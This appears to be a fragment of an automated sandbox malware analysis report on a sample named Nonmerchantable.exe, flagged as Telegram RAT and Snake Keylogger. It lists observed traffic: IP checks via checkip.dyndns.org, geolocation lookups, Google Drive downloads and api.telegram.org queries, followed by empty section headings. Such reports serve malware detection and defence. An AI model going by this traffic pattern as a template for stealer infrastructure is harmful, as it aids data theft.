Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Nonmerchantable.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Nonmerchantable.exe